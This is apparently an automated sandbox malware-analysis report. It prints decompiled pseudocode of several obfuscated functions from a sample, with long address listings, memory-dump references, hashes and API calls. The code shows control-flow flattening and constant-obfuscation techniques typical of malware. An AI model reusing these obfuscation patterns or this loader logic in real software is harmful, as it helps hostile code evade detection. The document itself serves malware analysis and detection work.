				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0022602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x23c030);
				_push(_v36);
				_t168 = E0023878F(_v28, _v32, __eflags);
				E002331E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00236A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00232025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

































                                              0x00232350
                                              0x00232354
                                              0x00232356
                                              0x0023235a
                                              0x0023235e
                                              0x0023235f
                                              0x00232360
                                              0x00232365
                                              0x0023236d
                                              0x00232370
                                              0x0023237a
                                              0x00232382
                                              0x00232384
                                              0x0023238c
                                              0x00232391
                                              0x00232399
                                              0x002323a1
                                              0x002323a6
                                              0x002323ae
                                              0x002323b6
                                              0x002323c4
                                              0x002323c9
                                              0x002323cf
                                              0x002323d7
                                              0x002323df
                                              0x002323e3
                                              0x002323eb
                                              0x002323f8
                                              0x002323fb
                                              0x002323ff
                                              0x00232407
                                              0x0023240f
                                              0x00232417
                                              0x0023241f
                                              0x0023242f
                                              0x00232433
                                              0x0023243f
                                              0x00232444
                                              0x0023244a
                                              0x00232452
                                              0x0023245a
                                              0x00232462
                                              0x00232467
                                              0x0023246f
                                              0x00232477
                                              0x00232483
                                              0x00232486
                                              0x0023248a
                                              0x00232492
                                              0x0023249a
                                              0x002324a2
                                              0x002324a7
                                              0x002324af
                                              0x002324b7
                                              0x002324bf
                                              0x002324cc
                                              0x002324d0
                                              0x002324d8
                                              0x002324e0
                                              0x002324e8
                                              0x002324f2
                                              0x002324ff
                                              0x0023250c
                                              0x00232514
                                              0x0023251c
                                              0x00232524
                                              0x0023252c
                                              0x0023253b
                                              0x0023253c
                                              0x00232540
                                              0x00232548
                                              0x0023254d
                                              0x00232555
                                              0x0023255d
                                              0x00232568
                                              0x0023256c
                                              0x00232574
                                              0x0023257a
                                              0x002325bb
                                              0x002325c0
                                              0x002325c4
                                              0x002325c6
                                              0x002325c8
                                              0x002325ca
                                              0x002325d0
                                              0x002325d0
                                              0x002325d2
                                              0x002325d8
                                              0x002325d8
                                              0x002325da
                                              0x002325e0
                                              0x002325e0
                                              0x002325dc
                                              0x002325dc
                                              0x002325de
                                              0x00000000
                                              0x00000000
                                              0x002325de
                                              0x002325d4
                                              0x002325d4
                                              0x002325d6
                                              0x00000000
                                              0x00000000
                                              0x002325d6
                                              0x002325cc
                                              0x002325cc
                                              0x002325ce
                                              0x00000000
                                              0x00000000
                                              0x002325ce
                                              0x002325e3
                                              0x002325e4
                                              0x002325e4
                                              0x002325e9
                                              0x00000000
                                              0x0023257c
                                              0x00232582
                                              0x002325b4
                                              0x00000000
                                              0x00232584
                                              0x0023258a
                                              0x0023265e
                                              0x0023265e
                                              0x00232664
                                              0x00000000
                                              0x00000000
                                              0x00232590
                                              0x002325aa
                                              0x002325b0
                                              0x00000000
                                              0x002325b0
                                              0x002325aa
                                              0x0023258a
                                              0x00232582
                                              0x00232673
                                              0x00232673
                                              0x002325ed
                                              0x002325f2
                                              0x002325fe
                                              0x0023260d
                                              0x0023261a
                                              0x00232637
                                              0x0023264c
                                              0x0023264e
                                              0x0023264e
                                              0x0023264e
                                              0x00232651
                                              0x00232656
                                              0x00232659
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                              • API String ID: 0-892457230
                                              • Opcode ID: 815ccb0c11ee2661b8ec0aee63e4ebf47096eb6e404b8ed23255f29f08f704cd
                                              • Instruction ID: 36500fddb28fb2357b03d4c0059b81775772d61e15009448fdf384df6c250f90
                                              • Opcode Fuzzy Hash: 815ccb0c11ee2661b8ec0aee63e4ebf47096eb6e404b8ed23255f29f08f704cd
                                              • Instruction Fuzzy Hash: 568174B1519341DFD768CF25C98A51BBBE1BBC0B18F90490DF1859A2A0D7B5CA1ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                              • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                              • PropVariantClear.OLE32(?), ref: 10002E75
                                              • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                              • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                              Strings
                                              • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: String$Free$AllocClearCreateInstancePropVariant
                                              • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                              • API String ID: 2501108336-1018649646
                                              • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                              • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                              • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                              • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00239B45, Relevance: 10.3, Strings: 8, Instructions: 294COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00239B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0022602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x23ca20; // 0x0
							_t260 = E00231B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0022F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00232674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00228736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x23ca20; // 0x0
						E002255D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x23ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0023838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00225F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}



















































                                              0x00239b49
                                              0x00239b53
                                              0x00239b54
                                              0x00239b5b
                                              0x00239b5d
                                              0x00239b5e
                                              0x00239b5f
                                              0x00239b64
                                              0x00239b6c
                                              0x00239b6f
                                              0x00239b7b
                                              0x00239b7d
                                              0x00239b84
                                              0x00239b87
                                              0x00239b8b
                                              0x00239b93
                                              0x00239b9b
                                              0x00239ba3
                                              0x00239ba8
                                              0x00239bb0
                                              0x00239bb8
                                              0x00239bc5
                                              0x00239bc9
                                              0x00239bd1
                                              0x00239bd9
                                              0x00239be1
                                              0x00239be9
                                              0x00239bf1
                                              0x00239bf9
                                              0x00239c01
                                              0x00239c09
                                              0x00239c11
                                              0x00239c19
                                              0x00239c21
                                              0x00239c29
                                              0x00239c2e
                                              0x00239c36
                                              0x00239c3e
                                              0x00239c46
                                              0x00239c4e
                                              0x00239c56
                                              0x00239c5e
                                              0x00239c63
                                              0x00239c6b
                                              0x00239c73
                                              0x00239c7b
                                              0x00239c83
                                              0x00239c87
                                              0x00239c8f
                                              0x00239c97
                                              0x00239c9f
                                              0x00239ca7
                                              0x00239caf
                                              0x00239cb7
                                              0x00239cbc
                                              0x00239cc4
                                              0x00239cd4
                                              0x00239cd8
                                              0x00239ce0
                                              0x00239ce8
                                              0x00239cf0
                                              0x00239cf5
                                              0x00239cfd
                                              0x00239d09
                                              0x00239d0c
                                              0x00239d10
                                              0x00239d18
                                              0x00239d20
                                              0x00239d26
                                              0x00239d2b
                                              0x00239d33
                                              0x00239d3b
                                              0x00239d43
                                              0x00239d4b
                                              0x00239d5a
                                              0x00239d5d
                                              0x00239d61
                                              0x00239d69
                                              0x00239d71
                                              0x00239d76
                                              0x00239d7e
                                              0x00239d86
                                              0x00239d93
                                              0x00239d97
                                              0x00239d9f
                                              0x00239da7
                                              0x00239daf
                                              0x00239db7
                                              0x00239dbf
                                              0x00239dc7
                                              0x00239dcc
                                              0x00239dd4
                                              0x00239de4
                                              0x00239de8
                                              0x00239df0
                                              0x00239df8
                                              0x00239e04
                                              0x00239e09
                                              0x00239e0f
                                              0x00239e14
                                              0x00239e1c
                                              0x00239e24
                                              0x00239e2c
                                              0x00239e31
                                              0x00239e39
                                              0x00239e3e
                                              0x00239e46
                                              0x00239e4e
                                              0x00239e56
                                              0x00239e5e
                                              0x00239e66
                                              0x00239e72
                                              0x00239e75
                                              0x00239e7c
                                              0x00239e85
                                              0x00239e89
                                              0x00239e91
                                              0x00239e91
                                              0x00239e95
                                              0x00239e95
                                              0x00239e95
                                              0x00239e9b
                                              0x00000000
                                              0x00000000
                                              0x0023a010
                                              0x0023a04c
                                              0x0023a064
                                              0x0023a069
                                              0x0023a06e
                                              0x0023a07a
                                              0x0023a07f
                                              0x0023a085
                                              0x0023a0a5
                                              0x0023a0ae
                                              0x0023a0ae
                                              0x00239e91
                                              0x00239e91
                                              0x00000000
                                              0x00239e91
                                              0x00239e91
                                              0x0023a070
                                              0x00239e91
                                              0x00239e91
                                              0x00000000
                                              0x00239e91
                                              0x00239e91
                                              0x0023a018
                                              0x0023a038
                                              0x00000000
                                              0x00000000
                                              0x0023a03a
                                              0x00000000
                                              0x0023a03a
                                              0x0023a020
                                              0x0023a08e
                                              0x0023a09e
                                              0x0023a0a4
                                              0x00000000
                                              0x0023a08e
                                              0x0023a028
                                              0x00000000
                                              0x00000000
                                              0x0023a02a
                                              0x0023a02a
                                              0x00239ea1
                                              0x00239ff8
                                              0x00239ffd
                                              0x0023a000
                                              0x00239e91
                                              0x00239e91
                                              0x00000000
                                              0x00239e91
                                              0x00239e91
                                              0x00239ead
                                              0x00239f9c
                                              0x00239fab
                                              0x00239fac
                                              0x00239fb0
                                              0x00239fb5
                                              0x00239fbb
                                              0x00000000
                                              0x00000000
                                              0x00239fc1
                                              0x00239fc3
                                              0x00239fcb
                                              0x00239fd2
                                              0x00239fd5
                                              0x00239fd9
                                              0x00000000
                                              0x00239fd9
                                              0x00239eb9
                                              0x00239f8c
                                              0x00000000
                                              0x00239f8c
                                              0x00239ec5
                                              0x00239f42
                                              0x00239f6f
                                              0x00239f74
                                              0x00239f79
                                              0x00239f81
                                              0x00239e91
                                              0x00239e91
                                              0x00000000
                                              0x00239e91
                                              0x00239e91
                                              0x00239ecd
                                              0x00239efb
                                              0x00239f00
                                              0x00239f01
                                              0x00239f24
                                              0x00239f2b
                                              0x00239f31
                                              0x00239f34
                                              0x00239e91
                                              0x00239e91
                                              0x00000000
                                              0x00239e91
                                              0x00239e91
                                              0x00239ed5
                                              0x00000000
                                              0x00000000
                                              0x00239eeb
                                              0x00239eec
                                              0x00239eed
                                              0x00239ef4
                                              0x00239ef4

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                              • API String ID: 0-2997250437
                                              • Opcode ID: 5fa90e81b1bdc2b0b43200c452c890c42120ed03d176507ae4c8609dc28830e2
                                              • Instruction ID: f8d2033a7d0a6587f36d9b6813c2f5ab1cebf6a57be5430e841a5063d0e4d914
                                              • Opcode Fuzzy Hash: 5fa90e81b1bdc2b0b43200c452c890c42120ed03d176507ae4c8609dc28830e2
                                              • Instruction Fuzzy Hash: 7DD133B11187418FE768CF65C48991BBBF1FB84708F208A1DF5D6862A0D7BAC959CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002312E2, Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E002312E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0022B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002228CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00225AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0023A889(_v1068, _v1064,  &_v1040);
							E00222BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00227B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x23ca2c; // 0x4d8300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0023889D(0x23c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x23ca2c; // 0x4d8300
						_t197 = _t293 + 0x230; // 0x700047
						E0022C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x23ca2c, _t257,  &_v520);
						_t256 = E00232025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002363C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}














































                                              0x002312e2
                                              0x002312e8
                                              0x002312ef
                                              0x002312f4
                                              0x002312f9
                                              0x00231301
                                              0x00231309
                                              0x00231311
                                              0x00231319
                                              0x00231321
                                              0x00231332
                                              0x0023133c
                                              0x00231341
                                              0x00231347
                                              0x0023134f
                                              0x00231357
                                              0x0023135f
                                              0x00231367
                                              0x0023136f
                                              0x00231377
                                              0x0023137f
                                              0x0023138b
